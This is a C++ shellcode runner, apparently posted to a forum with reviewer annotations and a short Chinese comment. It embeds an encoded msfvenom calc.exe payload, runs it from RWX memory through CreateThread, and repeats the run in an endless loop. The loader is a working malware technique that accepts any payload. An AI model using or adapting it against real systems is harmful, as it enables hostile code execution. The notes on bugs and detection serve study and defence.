#include <Windows.h>
#include <iostream>
#include <thread>   // NOTE(review): nothing in this file uses std::thread; the include is unused.

// Test harness for a position-independent payload blob: maps `buf` into a
// freshly allocated RWX region, starts a thread whose entry point is that
// region, blocks until the thread exits, then releases the region.
// Returns early (after printing a message) if VirtualAlloc or CreateThread
// fails; every outcome is reported on std::cout.
void ThreadFunc() {
    /* root@kali:~/Desktop# msfvenom -p windows/exec cmd=calc.exe -a x86 --platform windows -f c -b "\x00"
    Found 22 compatible encoders
    Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 220 (iteration=0)
    */
    // 220 bytes (14 rows of 15 plus a final row of 10), matching the size the
    // generator transcript above reports. Per that transcript it is an x86
    // windows/exec payload whose command is calc.exe; it has no 0x00 byte
    // because the generator was told to avoid it (-b "\x00").
    const char buf[] =
        "\xbd\x77\xd7\xc9\xae\xd9\xc2\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
        "\x31\x31\x6a\x13\x83\xea\xfc\x03\x6a\x78\x35\x3c\x52\x6e\x3b"
        "\xbf\xab\x6e\x5c\x49\x4e\x5f\x5c\x2d\x1a\xcf\x6c\x25\x4e\xe3"
        "\x07\x6b\x7b\x70\x65\xa4\x8c\x31\xc0\x92\xa3\xc2\x79\xe6\xa2"
        "\x40\x80\x3b\x05\x79\x4b\x4e\x44\xbe\xb6\xa3\x14\x17\xbc\x16"
        "\x89\x1c\x88\xaa\x22\x6e\x1c\xab\xd7\x26\x1f\x9a\x49\x3d\x46"
        "\x3c\x6b\x92\xf2\x75\x73\xf7\x3f\xcf\x08\xc3\xb4\xce\xd8\x1a"
        "\x34\x7c\x25\x93\xc7\x7c\x61\x13\x38\x0b\x9b\x60\xc5\x0c\x58"
        "\x1b\x11\x98\x7b\xbb\xd2\x3a\xa0\x3a\x36\xdc\x23\x30\xf3\xaa"
        "\x6c\x54\x02\x7e\x07\x60\x8f\x81\xc8\xe1\xcb\xa5\xcc\xaa\x88"
        "\xc4\x55\x16\x7e\xf8\x86\xf9\xdf\x5c\xcc\x17\x0b\xed\x8f\x7d"
        "\xca\x63\xaa\x33\xcc\x7b\xb5\x63\xa5\x4a\x3e\xec\xb2\x52\x95"
        "\x49\x4c\x19\xb4\xfb\xc5\xc4\x2c\xbe\x8b\xf6\x9a\xfc\xb5\x74"
        "\x2f\x7c\x42\x64\x5a\x79\x0e\x22\xb6\xf3\x1f\xc7\xb8\xa0\x20"
        "\xc2\xda\x27\xb3\x8e\x32\xc2\x33\x34\x4b";
    LPVOID lpvAddr;             // base of the executable region
    HANDLE hHand;               // handle of the thread running the payload
    DWORD dWaitRet, dThreadId;  // WaitForSingleObject result; thread id (written, never read)
    BOOL bSuccess;              // VirtualFree result

    // NOTE(review): strlen() stops at the first 0x00 byte, so the length used
    // here and in the copy below only equals the payload size because the
    // payload was encoded to contain no NUL; the length computation is
    // silently coupled to that generator option. The "+ 1" reserves a byte for
    // a terminator that is never copied.
    // Detection note: a private, writable AND executable region created at run
    // time (PAGE_EXECUTE_READWRITE) with a thread started inside it, outside
    // any loaded image, is the memory-scanner / EDR signature this pattern
    // leaves behind.
    lpvAddr = VirtualAlloc(NULL, strlen(buf) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpvAddr == NULL) {
        std::cout << "VirtualAlloc Failed." << std::endl;
        return;
    }
    // Copy the bytes into the RWX region; see the strlen() caveat above.
    RtlMoveMemory(lpvAddr, buf, strlen(buf));
    // The region's base address is cast (C-style) to a thread entry point; the
    // thread receives NULL as its parameter. Nothing below closes this handle
    // (no CloseHandle), so one thread handle is leaked per call.
    hHand = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpvAddr, NULL, 0, &dThreadId);
    if (hHand == NULL) {
        std::cout << "CreateThread Failed." << std::endl;
        return;
    }
    std::cout << "wait for thread... \n" << std::endl;
    // Blocks with no timeout: if the payload thread never exits, this function
    // never returns and the region is never freed.
    dWaitRet = WaitForSingleObject(hHand, INFINITE);
    if (dWaitRet == WAIT_FAILED) {
        std::cout << "WaitForSingleObject Failed." << std::endl;
    }
    else if (dWaitRet == WAIT_ABANDONED) {
        // NOTE(review): WAIT_ABANDONED is only reported for mutex handles;
        // hHand is a thread handle, so this branch (and its message) does not
        // apply here.
        std::cout << "Ownership issue with mutex." << std::endl;
    }
    // Release the whole region (dwSize must be 0 with MEM_RELEASE).
    bSuccess = VirtualFree(lpvAddr, 0, MEM_RELEASE);
    if (bSuccess) {
        std::cout << "Release Succeeded." << std::endl;
    }
    else if (!bSuccess) {  // equivalent to a plain else; the condition is redundant
        std::cout << "Release Failed." << std::endl;
    }
    return;  // redundant at the end of a void function
}

// Runs the payload forever: one execution every 10 s (Sleep takes
// milliseconds), so the handle leak noted in ThreadFunc grows without bound.
// The loop never terminates, so main never reaches its (implicit) return.
int main() {
    while (1) {
        std::cout << "starting new thread... \n" << std::endl;
        ThreadFunc();
        Sleep(10000);
    }
}
youxiaxy 我也没仔细分析，有错的地方还望见谅。这段 shellcode 先解密自身，然后调用 API WinExec 启动计算器，最后执行了 Ex ...